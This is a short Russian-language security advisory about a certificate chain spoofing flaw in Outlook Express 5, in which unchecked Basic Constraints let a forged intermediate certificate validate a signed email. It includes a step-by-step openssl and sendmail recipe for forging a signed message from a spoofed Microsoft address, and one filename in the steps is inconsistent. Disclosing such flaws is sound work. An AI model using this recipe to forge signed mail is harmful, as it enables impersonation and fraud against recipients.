В связке Outlook/MIME можно организовать
подмену сертификатов (certificate chain spoofing attack), несмотря на заявление Microsoft, что IE является единственным уязвимым приложением. Уязвимость позволяют любому
представлять верную цифровую подпись в электронном сообщении, которую просмотрит Outlook без каких либо предупреждений. Пример: 

Атакующий создает некорректную цепочку сертификатов: 

[Issuer:VeriSign | Subject:VeriSign] > [Issuer:VeriSign |
Subject:www.thoughtcrime.org] > [Issuer:www.thoughtcrime.org | 
Subject:Bill Gates/billgates@microsoft.com]

Кроме того, Outlook не в состоянии проверять Основные Ограничения (Basic Constraints) на промежуточный сертификат и принимает такой сертификат как правильный. Уязвимость не делает никакого различия между подписанной и не подписанной электронной почтой в Outlook. Пользователи, которые должны использовать Outlook для
получения подписанных сообщений, должны вручную просмотреть и проверить полученные цепочки сертификатов за последние пять лет. Эксплоит: 

  1. Поместите допустимый CA сертификат и секретный ключ в файл "middle.pem". 
  2. Создайте поддельный сертификат, подписывая запрос: 
    openssl genrsa -out key.pem 1024 
    openssl req -new -key key.pem -out leaf.c 
  3. Подпишите CSR с вашим "промежуточным" сертификатом: 
    openssl x509 -req -in leaf.csr -CA middle.pem -CAkey middle.pem -CAcreateserial -out leaf.pem 
  4. Подпишите поддельное E-mail сообщение: 
    openssl smime -sign -in mail.txt -text -out mail.msg -signer leaf.pem -inkey key.pem -certfile middle.pem -from billgates@microsoft.com -to whomever@wherever.com -subject "SM Exploit" 
  5. Пошлите сообщение: 
    cat mail.msg | sendmail whomever@wherever.com

Уязвимость обнаружена в Outlook Express 5.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии